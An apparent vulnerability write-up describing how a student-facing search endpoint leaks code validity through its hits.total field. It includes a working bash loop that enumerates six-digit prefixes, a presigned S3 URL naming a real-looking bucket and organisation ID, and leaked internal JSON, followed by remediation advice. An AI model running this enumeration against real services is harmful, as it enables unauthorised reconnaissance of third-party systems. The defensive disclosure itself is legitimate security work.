Just another endpoint:
/pine/aisearch?aicode=XXXXXX
Simple input. Simple output. Nothing interesting… until it was.
The Spark
I was testing it from a normal student account.
The behavior was straightforward:
- Send an aicode
- Get a response with hits.total
But then something stood out:
- hits.total = 0 → invalid code
- hits.total > 0 → valid code
That's when it clicked.
This wasn't just a search endpoint.
It was an oracle.
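The oracle behavior can be sketched in a few lines. This is only an illustration: it assumes the response body is JSON with a nested `hits.total` field (inferred from the field name above), and the helper name `classify_response` is hypothetical.

```python
import json


def classify_response(body: str) -> bool:
    """Return True when the response signals a valid code (hits.total > 0)."""
    data = json.loads(body)
    # Assumed shape: {"hits": {"total": <int>}}; missing fields count as zero.
    total = data.get("hits", {}).get("total", 0)
    return total > 0


print(classify_response('{"hits": {"total": 0}}'))  # invalid code
print(classify_response('{"hits": {"total": 3}}'))  # valid code
```

One bit of information per request is all an attacker needs: the answer to "does this exist?" is the leak.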
Phase 1 — Turning It into an Enumeration Machine
The AI code format:
^\d{6}[\dA-Z]{6}$
The first 6 digits? That's the key.
Instead of brute-forcing all 10⁶ × 36⁶ ≈ 2.2 × 10¹⁵ possible codes, I only needed to scan the 10⁶ possible prefixes.
That's not brute force anymore. That's feasibility.
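A quick back-of-the-envelope check, taking the pattern at face value: six digits followed by six characters drawn from a 36-symbol alphabet (0-9 and A-Z). The constant and function names here are illustrative, not taken from the application.

```python
import re

# Pattern quoted in the write-up; re.ASCII keeps \d limited to 0-9.
AI_CODE_RE = re.compile(r"^\d{6}[\dA-Z]{6}$", re.ASCII)

PREFIX_SPACE = 10 ** 6   # six decimal digits
SUFFIX_SPACE = 36 ** 6   # six symbols from a 36-character alphabet
FULL_SPACE = PREFIX_SPACE * SUFFIX_SPACE


def is_well_formed(code: str) -> bool:
    """Check a candidate against the documented format."""
    return AI_CODE_RE.fullmatch(code) is not None


print(f"prefixes to scan: {PREFIX_SPACE:,}")
print(f"full keyspace:    {FULL_SPACE:.2e}")
print(f"reduction factor: {SUFFIX_SPACE:,}")
```

Scanning prefixes alone cuts the work by a factor of 36⁶, roughly two billion, which is what moves the attack from impractical to an afternoon of requests.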
Quick script:
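for i in {000000..999999}; do
  # Query the oracle with this 6-digit prefix ([app] is the redacted host)
  response=$(curl -s "https://[app]/pine/aisearch?aicode=${i}XXXXXX")
  # Any non-zero total means the prefix matched at least one code
  if echo "$response" | grep -Eq '"total":[[:space:]]*[1-9]'; then
    echo "[+] Valid prefix found: $i"
  fi
done
And just like that… valid prefixes start revealing themselves.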
Phase 2 — The Unexpected Door (S3)
While tracing the backend flow, something more interesting showed up.
The server was generating presigned AWS S3 URLs.
Example:
https://cb-cds-org-update-pine.s3.us-east-1.amazonaws.com/1008877/ais_1008877.json?X-Amz-...
What makes this worse?
- No authentication required
- No cookies
- Accessible by anyone with the link
- Valid for 1 full hour
If that URL leaks… it's done.
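The validity window can be read straight off the URL: SigV4 presigned URLs carry the signing time in `X-Amz-Date` and the lifetime in seconds in `X-Amz-Expires`. The sketch below parses both. The example URL is entirely hypothetical (bucket, key, and parameter values are made up), since the real query string is elided above.

```python
from datetime import datetime, timedelta, timezone
from typing import Tuple
from urllib.parse import parse_qs, urlsplit


def presigned_window(url: str) -> Tuple[datetime, datetime]:
    """Return (signed_at, expires_at) from a SigV4 presigned URL's query string."""
    query = parse_qs(urlsplit(url).query)
    signed_at = datetime.strptime(
        query["X-Amz-Date"][0], "%Y%m%dT%H%M%SZ"
    ).replace(tzinfo=timezone.utc)
    lifetime = timedelta(seconds=int(query["X-Amz-Expires"][0]))
    return signed_at, signed_at + lifetime


# Hypothetical URL for illustration only; none of these values come from the target.
EXAMPLE_URL = (
    "https://example-bucket.s3.us-east-1.amazonaws.com/0000000/example.json"
    "?X-Amz-Algorithm=AWS4-HMAC-SHA256"
    "&X-Amz-Date=20240101T120000Z"
    "&X-Amz-Expires=3600"
    "&X-Amz-SignedHeaders=host"
    "&X-Amz-Signature=deadbeef"
)

signed_at, expires_at = presigned_window(EXAMPLE_URL)
print("signed at: ", signed_at.isoformat())
print("expires at:", expires_at.isoformat())
```

Anyone holding the URL during that window has the same access as the party it was issued to, because the signature in the query string is the only credential.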
Phase 3 — What's Inside?
Opening the JSON turned this from a minor bug into something else entirely.
{
  "orgId": "1008877",
  "aiCodes": [
    {
      "aiCd": "098522",
      "aiLevelCd": "2",
      "aiSourceCd": "CC",
      "aiStatusCd": "2",
      "apEligibilityInd": "Y",
      "psatEligibilityInd": "Y",
      "satEligibilityInd": "Y",
      "clepEligibilityInd": "Y",
      "annualReviewInd": "N",
      "initialIngestionPathCd": "1",
      "ssdEligibilityInd": "Y"
    }
  ]
}
This isn't just data.
This is:
- Internal organization IDs
- Valid AI codes
- Program eligibility logic (AP / SAT / PSAT / CLEP / SSD)
- Operational flags
- System behavior hints
In other words… a blueprint.
Why This Matters (Even Without PII)
A common mistake is downplaying bugs like this because "there's no personal data."
That's missing the point.
1. Search Space Reduction
Instead of guessing blindly, you now have valid prefixes.
2. System Logic Exposure
You understand how eligibility decisions are structured.
3. Reconnaissance Advantage
Small leaks combine into a full system map.
4. Chaining Potential
This isn't the attack. This enables future attacks.
The Real Issue
The problem wasn't just S3. And it wasn't just the endpoint.
It was the combination:
- An endpoint acting as an oracle
- No rate limiting
- Presigned URLs exposed to the client
- Overly verbose JSON responses
That combination turned a simple feature… into a scalable vulnerability.
How I'd Fix It
Immediate
- Add strict rate limiting (e.g., 10 requests/minute per user)
- Invalidate all existing presigned URLs (for example, by rotating the credentials that signed them)
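As a rough sketch of the rate-limiting idea, here is a per-user sliding-window limiter using the 10 requests/minute figure from above. It is in-memory and single-process, which is an assumption made for brevity; a real deployment would more likely keep the counters in a shared store or enforce the limit at the gateway. The class name is hypothetical.

```python
import time
from collections import defaultdict, deque
from typing import Callable, DefaultDict, Deque


class SlidingWindowLimiter:
    """Allow at most `limit` requests per `window` seconds for each user."""

    def __init__(self, limit: int = 10, window: float = 60.0,
                 clock: Callable[[], float] = time.monotonic) -> None:
        self.limit = limit
        self.window = window
        self.clock = clock  # injectable so the limiter can be tested without sleeping
        self._hits: DefaultDict[str, Deque[float]] = defaultdict(deque)

    def allow(self, user_id: str) -> bool:
        now = self.clock()
        hits = self._hits[user_id]
        # Drop timestamps that have aged out of the window.
        while hits and now - hits[0] >= self.window:
            hits.popleft()
        if len(hits) >= self.limit:
            return False
        hits.append(now)
        return True


limiter = SlidingWindowLimiter()
allowed = sum(limiter.allow("student-1") for _ in range(12))
print(f"{allowed} of 12 rapid requests allowed")
```

At 10 requests per minute, scanning a million prefixes from one account would take about 100,000 minutes, close to 70 days, which is long enough for logging to catch it.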
Short-term
- Stop exposing S3 URLs to clients
- Proxy requests through the backend
- Return only necessary fields
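"Return only necessary fields" can be as simple as an allowlist applied in the backend before anything reaches the client. In the sketch below the choice of `aiCd` and `aiStatusCd` as the public fields is purely an assumption for illustration; which fields the client actually needs is a product decision the write-up does not settle.

```python
from typing import Any, Dict, List

# Hypothetical allowlist: the real set of client-facing fields is an assumption.
PUBLIC_FIELDS = frozenset({"aiCd", "aiStatusCd"})


def to_public_view(payload: Dict[str, Any]) -> Dict[str, List[Dict[str, Any]]]:
    """Keep only allowlisted fields from each aiCodes entry; drop orgId entirely."""
    return {
        "aiCodes": [
            {key: value for key, value in entry.items() if key in PUBLIC_FIELDS}
            for entry in payload.get("aiCodes", [])
        ]
    }


# Trimmed copy of the sample payload shown earlier in the write-up.
internal = {
    "orgId": "1008877",
    "aiCodes": [
        {"aiCd": "098522", "aiLevelCd": "2", "aiStatusCd": "2",
         "apEligibilityInd": "Y", "initialIngestionPathCd": "1"},
    ],
}
print(to_public_view(internal))
```

An allowlist fails closed: a new internal field added to the S3 object later stays hidden until someone deliberately exposes it.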
Medium-term
- Sanitize S3 payloads
- Remove internal metadata fields
- Add logging and anomaly detection for enumeration patterns
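One simple signal for enumeration is a single user probing many distinct codes that all come back empty. The detector below is a minimal sketch of that idea: the threshold of 20 is an arbitrary placeholder, the class name is hypothetical, and it keeps no time window, so a real version would also expire old entries.

```python
from collections import defaultdict
from typing import DefaultDict, Set


class EnumerationDetector:
    """Flag users who probe many distinct codes that return zero hits."""

    def __init__(self, max_distinct_misses: int = 20) -> None:
        self.max_distinct_misses = max_distinct_misses
        self._misses: DefaultDict[str, Set[str]] = defaultdict(set)

    def record(self, user_id: str, aicode: str, total_hits: int) -> bool:
        """Record one lookup; return True once the user looks like an enumerator."""
        if total_hits == 0:
            self._misses[user_id].add(aicode)
        return len(self._misses[user_id]) > self.max_distinct_misses


detector = EnumerationDetector(max_distinct_misses=3)
flags = [detector.record("student-1", f"{i:06d}XXXXXX", 0) for i in range(5)]
print(flags)
```

Counting distinct misses rather than raw requests means a user who retries the same mistyped code is not flagged, while a sequential sweep is.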
Final Thought
The most dangerous vulnerabilities aren't the ones that break systems.
They're the ones that teach you how the system works.
Because once the system starts explaining itself… you're no longer attacking it.
You're reading it.